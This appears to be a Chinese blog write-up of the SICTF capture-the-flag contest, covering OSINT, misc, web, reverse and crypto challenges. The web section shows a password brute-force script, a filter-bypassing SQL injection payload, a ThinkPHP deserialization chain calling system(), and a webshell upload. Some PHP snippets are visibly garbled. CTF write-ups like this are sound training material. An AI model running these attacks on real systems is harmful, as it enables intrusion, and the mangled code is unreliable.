首页 WP

# OSINT

# [签到] OSINT 签到

img

谷歌识图加上热带植被 (其实不用识图,太熟了(bushi))

flag:SICTF

# 这才是签到

谷歌识图直接得到酒店名称

img

因为提示说地点不是酒店,因而是码头,通过谷歌地图搜索得到码头名称

img

通过聊天记录得知目的地在小道里且在有名的地点,可得 flag

img

SICTF

# 树木的压迫

通过谷歌搜图可得四川达州

img

通过体育馆 + 达州关键词,加以卫星图辅助可得 flag

img

flag:SICTF

# 真的签到

通过谷歌识图发现一个类似的 b 站视频封面,于是进去核对特征,发现一样

img

视频链接:https://www.bilibili.com/video/BV1nj411d72o

即得 flag

img

flag:SICTF

# 签退

通过识图蜘蛛侠发现线索

imghttps://www.reddit.com/r/Spiderman/comments/ch5kg7/spiderman_spotted_in_cape_town/

img

通过视频发现具体街道线索 https://www.youtube.com/watch?v=Fu4pSfWVDAM

img

通过谷歌街景可以发现 flag

img

# Misc

# 问卷调查

交个问卷:

img

# 签到

直接公众号回复

img

# GeekChallege

直接通过脚本连接服务器爆破密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
from pwn import *
import string


HOST = 'yuanshen.life'
PORT = 00000
chars = string.printable


def guess_password():
    s = remote(HOST, PORT)
    server_greeting = s.recvuntil(b'>')
    print("Server greeting:", server_greeting.decode()) 
    pwd = ['0']*114
    arrk = 0
    for char in chars:
        guess = char*114
        s.sendline(guess.encode())
        response = s.recvline().decode().strip() 
        if '1' in response:
            arrk += 1
            print(f"Character found: {char}")
            print(f"Response: {response}")
            for i in range(len(response)):
                if response[i] == '1':
                    pwd[i] = char
        server_greeting = s.recvuntil(b'>')
        if arrk == 5:
            break
    pwd1 = "".join(pwd)
    print(f"Final password: {pwd1}")
    # s.interactive()
    s.sendline(pwd1.encode())
    flag = s.recvuntil(b'}').split(b'\n')[-1]
    print('This is flag:\n', flag.decode())
    s.close()
guess_password()

# 真💨签到

通过 010 查看压缩包末尾存在隐写

img

通过 hex 转换

img

通过题目提示文本加密

img

可得压缩包密码

img

通过音频频谱图发现图片密码

img

通过文件名可知 lagrange 要大写

img

通过 steghide 工具解密可得 flag

img

img

# WHO?WHO?WHO

通过字典爆破压缩包

img

运用工具进行 0 宽检查

img

通过 txt 文件名猜得 shumu 是密钥

img

dna 解密脚本 https://github.com/omemishra/DNA-Genetic-Python-Scripts-CTF/blob/master/dnacode.py,然后根据密文添加 {} 和_就行

img

# New Year's regret

掩码爆破

img

二进制转图片,发现音符

img

img

音符解密出 flag 后三分之一

img

汉信码扫描出来无效信息,binwalk 分离出 result.txt

img

循环 base64 解码 + 生成图片得到二维码,扫描得 flag 前三分之一

img

foremost-task.png 出来一张武器图,根据提示统计武器星数(战双的武器)

img

三种数字想到摩斯密码 4 为. 5 为空格 6 为 - ,解密得 flag 中间部分的三分之一

img

# 日志分析 1

ip 通过出入站分析为 192.168.222.200

img

img

img

img

# 日志分析 2

chatgpt 帮忙日志分析(过程省略)

img

通过搜索发现蚁剑

img

# 神秘的流量

根据提示通过百度搜到一位大佬的博客直接跟着解就行

https://fdlucifer.github.io/2022/01/05/decrypt-cs-traffic/

img

img

# WEB

# 100%_upload

先对上传文件进行绕过,尝试 php,php + 数字,等方法

尝试.user.ini,.htaccess 传入图片马,访问 url+/upload/xxx.png 都无法连接

之后观察首页发现 http://yuanshen.life:36600/index.php?file=upload.php

把 upload.php 进行修改,发现出现报错

根据报错显示可以直接进行 include 文件包含,之后尝试包含 flag

显示无法直接包含,那就传入个图片马,结果出现错误,把一句话木马修改为短标签进行绕过

成功上传蚁剑连接

得到 flag

img

# Not just unserializa

审计代码发现序列化链 O:5:"start":2:{s:7:"welcome";O:2:"SE":1:{s:4:"year";O:2:"CR":1:{s:3:"new";s:8:"nonewea";s:8:"worries";s:8:"worries";}} s:3:"you";s:7:"I'mnew";}

题目提示给了 RUN ln -sf /bin/bash/bin/sh

尝试使用环境变量注入

https://tttang.com/archive/1450/#toc_0x04-dash p 神的文章

根据源码对 poc 链进行 base64 加密,利用函数 BASH_FUNC_xxx%% 执行命令

img

# EZ_SSRF

审计代码以及对网页目录扫描

发现存在 admin.php

<?php
error_reporting(0);
include "flag.php";
highlight_file(FILE);
allowedip="127.0.0.1";if(allowed_ip = "127.0.0.1"; if (_SERVER['REMOTE_ADDR'] !== $allowed_ip) {
die("You can't get flag");
} else {
echo $flag;
}
?>

构造个本地访问的链即可

之后传入 Harder 中

?Harder= O:6:"client":1:

base64 以下得到的编码

img

# hacker

img

根据题目进行构造 url/?username=joe

仍然是 0 结果,之后直接丢给 sqlmap

发现果然注入失败

尝试联合注入筛选过滤字符

大概筛 & | --+ -- and or order like information 空格

等关键字符

利用联合注入查询到 database () 数据库名

使用 /**/ 替代空格 %23 替代 --+

由于吧 information 过滤掉导致无论如何都无法完成列名查询

所以需要无列名注入

构造 payload:

yuanshen.life:3870/?username=1%27union//select//concat(%602%60)//from//(select//1,2//union//select//*//from//flag)ctf%23

或者 username=1'//union//select//group_concat( 2 )//from//(select//1,2//union//select//*//from/**/flag) ctf%23 皆可

成功爆出 flag 值

img

# Oyst3rPHP

瞅了瞅没啥东西,拿子域名挖掘机挖出来份源码

下载源码

在源码中查找 index.php 文件发现需要寻找第三个生蚝函数

通过查询成功找到三个生蚝

之后就需要对其利用

第一个生蚝是 MD5 比对

第二个生蚝是对 key 进行 post 传参绕过

Z3r4y 对其进行字数绕过末尾加上 603THINKPHP

利用报错信息报错搜索版本号信息 exp

https://blog.csdn.net/weixin_45794666/article/details/123237118

直接拿构造好的链子打就行

<?php

namespace think\model\concern;

trait Attribute

{

​ private $data = ["key"=>"whoami"];

​ private $withAttr = ["key"=>"system"];

}

namespace think;

abstract class Model

{

​ use model\concern\Attribute;

​ private $lazySave = true;

​ protected $withEvent = false;

​ private $exists = true;

​ private $force = true;

​ protected $name;

​ public function __construct($obj=""){

this>name=this->name=obj;

​ }

}

namespace think\model;

use think\Model;

class Pivot extends Model

{}

$a=new Pivot();

b=newPivot(b=new Pivot(a);

echo base_64encode(serialize($b));

运行脚本后

和上一个用 & 合并即可

img

# Reverse

# [Game][Battle City]

修改 ldtx 关卡文件,使关卡变简单即可

img

通过后文件夹中出现 win.png,扫描记得 flag

img

# [签到] Baby_C++

查看程序对 16 进制进行转化字符

img

# Crypto

# [签到] Vigenere

直接用网页爆破就行:

img

# 签到,确信!

小鸡块博客里找到了解法。。。。

大概意思就是:通过商环和立方差公式可知 ——img 对应的多项式的其中一个项的系数与img 的最大公因数就是img

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from Crypto.Util.number import *

n = 8361361624563191168612863710516449028280757632934603412143152925186847721821552879338608951120157631182699762833743097837368740526055736516080136520584848113137087581886426335191207688807063024096128001406698217998816782335655663803544853496060418931569545571397849643826584234431049002394772877263603049736723071392989824939202362631409164434715938662038795641314189628730614978217987868150651491343161526447894569241770090377633602058561239329450046036247193745885174295365633411482121644408648089046016960479100220850953009927778950304754339013541019536413880264074456433907671670049288317945540495496615531150916647050158936010095037412334662561046016163777575736952349827380039938526168715655649566952708788485104126900723003264019513888897942175890007711026288941687256962012799264387545892832762304320287592575602683673845399984039272350929803217492617502601005613778976109701842829008365226259492848134417818535629827769342262020775115695472218876430557026471282526042545195944063078523279341459199475911203966762751381334277716236740637021416311325243028569997303341317394525345879188523948991698489667794912052436245063998637376874151553809424581376068719814532246179297851206862505952437301253313660876231136285877214949094995458997630235764635059528016149006613720287102941868517244509854875672887445099733909912598895743707420454623997740143407206090319567531144126090072331
e = 65537
c = 990174418341944658163682355081485155265287928299806085314916265580657672513493698560580484907432207730887132062242640756706695937403268682912083148568866147011247510439837340945334451110125182595397920602074775022416454918954623612449584637584716343806255917090525904201284852578834232447821716829253065610989317909188784426328951520866152936279891872183954439348449359491526360671152193735260099077198986264364568046834399064514350538329990985131052947670063605611113730246128926850242471820709957158609175376867993700411738314237400038584470826914946434498322430741797570259936266226325667814521838420733061335969071245580657187544161772619889518845348639672820212709030227999963744593715194928502606910452777687735614033404646237092067644786266390652682476817862879933305687452549301456541574678459748029511685529779653056108795644495442515066731075232130730326258404497646551885443146629498236191794065050199535063169471112533284663197357635908054343683637354352034115772227442563180462771041527246803861110504563589660801224223152060573760388045791699221007556911597792387829416892037414283131499832672222157450742460666013331962249415807439258417736128976044272555922344342725850924271905056434303543500959556998454661274520986141613977331669376614647269667276594163516040422089616099849315644424644920145900066426839607058422686565517159251903275091124418838917480242517812783383
k = 7

R = Zmod(n)["x"]
while True:
    Q = R.quo(R.random_element(k))
    pp = gcd(ZZ(list(Q.random_element() ^ n)[1]), n)
    if pp != 1:
        qq = sum([pp**i for i in range(k)])
        rr = n // (pp * qq)
        assert n == pp * qq * rr
        break
phi = (pp - 1) * (qq - 1) * (rr - 1)
d = pow(e, -1, phi)
m = pow(c, d, n)
print(long_to_bytes(int(m)))
# SICTF{d9428fc7-fa3a-4096-8ec9-191c0a4562ff}

# gggcccddd

一开始看到的时候,想着这不是相关信息攻击吗?直接用 Franklin-Reiter 相关消息攻击就行。

但运行后加载了老半天。。。不太对(

但该说是机缘巧合吗。。。比赛群里当时有晒 Kicky_Mu 的博客,就随便去看看,在里边的文章里找到了解法

img

直接用该方法就行:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
from Crypto.Util.number import *


def HGCD(a, b):
    if 2 * b.degree() <= a.degree() or a.degree() == 1:
        return 1, 0, 0, 1
    m = a.degree() // 2
    a_top, a_bot = a.quo_rem(x^m)
    b_top, b_bot = b.quo_rem(x^m)
    R00, R01, R10, R11 = HGCD(a_top, b_top)
    c = R00 * a + R01 * b
    d = R10 * a + R11 * b
    q, e = c.quo_rem(d)
    d_top, d_bot = d.quo_rem(x^(m // 2))
    e_top, e_bot = e.quo_rem(x^(m // 2))
    S00, S01, S10, S11 = HGCD(d_top, e_top)
    RET00 = S01 * R00 + (S00 - q * S01) * R10
    RET01 = S01 * R01 + (S00 - q * S01) * R11
    RET10 = S11 * R00 + (S10 - q * S11) * R10
    RET11 = S11 * R01 + (S10 - q * S11) * R11
    return RET00, RET01, RET10, RET11
    
def GCD(a, b):
    print(a.degree(), b.degree())
    q, r = a.quo_rem(b)
    if r == 0:
        return b
    R00, R01, R10, R11 = HGCD(a, b)
    c = R00 * a + R01 * b
    d = R10 * a + R11 * b
    if d == 0:
        return c.monic()
    q, r = c.quo_rem(d)
    if r == 0:
        return d
    return GCD(d, r)


n = 71451784354488078832557440841067139887532820867160946146462765529262021756492415597759437645000198746438846066445835108438656317936511838198860210224738728502558420706947533544863428802654736970469313030584334133519644746498781461927762736769115933249195917207059297145965502955615599481575507738939188415191
c1 = 60237305053182363686066000860755970543119549460585763366760183023969060529797821398451174145816154329258405143693872729068255155086734217883658806494371105889752598709446068159151166250635558774937924668506271624373871952982906459509904548833567117402267826477728367928385137857800256270428537882088110496684
c2 = 20563562448902136824882636468952895180253983449339226954738399163341332272571882209784996486250189912121870946577915881638415484043534161071782387358993712918678787398065688999810734189213904693514519594955522460151769479515323049821940285408228055771349670919587560952548876796252634104926367078177733076253
e = 65537
a = 233
b = 9527
R.<x> = PolynomialRing(Zmod(n))
f = x^e - c1
g = (a*x+b)^e - c2

res = GCD(f,g)

m = -res.monic().coefficients()[0]
print(m)
flag = long_to_bytes(int(m))
print(flag)

然后一分钟内就出结果了

img

# 铜匠

这题的话,因为我之前有见过类似题目名字,所以一打开脚本就直接看一下能不能 copper

已知信息是:题目中的 p 是一个 512 位的素数,leak 是 p 的五进制的前 112 位

当时是想着二进制的 copper,结果发现缺失的位数是 253 位来着,而img公式来源);可见 —— 即便要加上爆破,但位数差的也太多了。。。所以就开始迟疑了一下。

但后来有个疑问:题目干嘛会给的 5 进制?

于是我就去随便生成 512 位的素数进行 5 进制转换,发现对应的长度基本都是 221,而未知位数为 109

感觉未知位数比直接二进制的情况下要少,但又不太好确定能不能直接按 109 位去 5 进制 copper,所以就去先试了试 5 进制下的低 1 位爆破 + 5 进制 copper,然后大概 1 分钟那样就出 flag 了(这里的确是做急了当时。。。算是猜的)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# sage
from tqdm import *
from Crypto.Util.number import *
from gmpy2 import *
leak = "2011133132443111302000224204142244403203442000141102312242343143241244243020003333022112141220422134444214010012"
n = 85988668134257353631742597258304937106964673395852009846703777410474172989069717247424903079500594820235304351355706519069516847244761609583338251489134035212061654870087550317540291994559481862615812258493738064606592165529948648774081655902831715928483206013332330998262897765489820121129058926463847702821
e = 65537
c = 64708526479058278743788046708923650158905888858865427385501446781738669889375403360886995849554813207230509920789341593771929287415439407977283018525484281064769128358863513387658744063469874845446480637925790150835186431234289848506337341595817156444941964510251032210939739594241869190746437858135599624562
p0 = int(leak+"0"*109, 5)
p = 0
ff = 0
for i in trange(5):
        PR.<x> = PolynomialRing(Zmod(n))
        f = p0 + i + x*5
        f = f.monic()
        res = f.small_roots(X = 5**108,beta=0.49, epsilon = 0.01)
        if(res != []):
            p = int(p0 + i + int(res[0]) * 5)
            assert is_prime(p)
            ff = 1
            break
    if ff:
        break
if p:
    q = n // p
    phi = (p-1)*(q-1)
    d = invert(e, phi)
    m = pow(c, d, n)
    print(long_to_bytes(int(m)))

img

# easyLattice(二血)

没啥好说,就是一个与下面类似简单的格:

img

但得配平一下,我是对最后一列的数都乘上了 2**256:

1
2
3
4
5
6
7
8
9
10
11
from Crypto.Util.number import *

h = 9848463356094730516607732957888686710609147955724620108704251779566910519170690198684628685762596232124613115691882688827918489297122319416081019121038443
p = 11403618200995593428747663693860532026261161211931726381922677499906885834766955987247477478421850280928508004160386000301268285541073474589048412962888947     
L = Matrix(ZZ, [[1, h*2**256],
                [0, p*2**256]])

m = abs(L.LLL()[0][0])
# print(m)
print(long_to_bytes(int(m)))
# SICTF{e3fea01c-18f3-4638-9544-9201393940a9}A\xf0\x89\x84

# [进阶] 2024_New_Setback

一开始解这题的时候,没一点思路,就不管了。。。

差不多要结束的时候,就想着说随便去网上搜搜看得了,没准碰到类似的题?

当时搜的内容是:ctf def new(C, P, Q): c, d, p = C u1, v1 = P u2, v2 = Q assert happy(C, P) and happy(C, Q) u3 = (u1 * v2 + v1 * u2) * inverse(c * (1 + d * u1 * u2 * v1 * v2), p) % p v3 = (v1 * v2 - u1 * u2) * inverse(c * (1 - d * u1 * u2 * v1 * v2), p) % p return (int(u3), int(v3))

结果还真遇到了,而且是原题 - RoHaLd。。。。

img

不仅题目代码一样,数据还一模一样。。。img

所以,没啥好说,flag 内容估计也一样。。。于是直接交了

等赛后再研究研究这个是咋解吧(

# SuperbRSA

没啥好说,就是个 e1 和 e2 不互素下的共模攻击:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from libnum import *
from gmpy2 import *
from

n= 19006830358118902392432453595802675566730850352890246995920642811967821259388009049803513102750594524106471709641202019832682438027312468849299985832675191795417160553379580813410722359089872519372049229233732405993062464286888889084640878784209014165871696882564834896322508054231777967011195636564463806270998326936161449009988434249178477100127347406759932149010712091376183710135615375272671888541233275415737155953323133439644529709898791881795186775830217884663044495979067807418758455237701315019683802437323177125493076113419739827430282311018083976114158159925450746712064639569301925672742186294237113199023
c1= 276245243658976720066605903875366763552720328374098965164676247771817997950424168480909517684516498439306387133611184795758628248588201187138612090081389226321683486308199743311842513053259894661221013008371261704678716150646764446208833447643781574516045641493770778735363586857160147826684394417412837449465273160781074676966630398315417741542529612480836572205781076576325382832502694868883931680720558621770570349864399879523171995953720198118660355479626037129047327185224203109006251809257919143284157354935005710902589809259500117996982503679601132486140677013625335552533104471327456798955341220640782369529
c2= 11734019659226247713821792108026989060106712358397514827024912309860741729438494689480531875833287268454669859568719053896346471360750027952226633173559594064466850413737504267807599435679616522026241111887294138123201104718849744300769676961585732810579953221056338076885840743126397063074940281522137794340822594577352361616598702143477379145284687427705913831885493512616944504612474278405909277188118896882441812469679494459216431405139478548192152811441169176134750079073317011232934250365454908280676079801770043968006983848495835089055956722848080915898151352242215210071011331098761828031786300276771001839021
e1=55
e2=200

_, k1, k2 = gcdext(e1, e2)
g = gcd(e1, e2)
m = pow(pow(c1, k1, n)*pow(c2, k2, n),1,n)
print(long_to_bytes(iroot(Integer(m), 3)[0]))
# SICTF{S0_Great_RSA_Have_Y0u_Learned?}

更新于 阅读次数

请我喝[茶]~( ̄▽ ̄)~*

泠鹇 微信支付

微信支付

泠鹇 支付宝

支付宝

泠鹇 贝宝

贝宝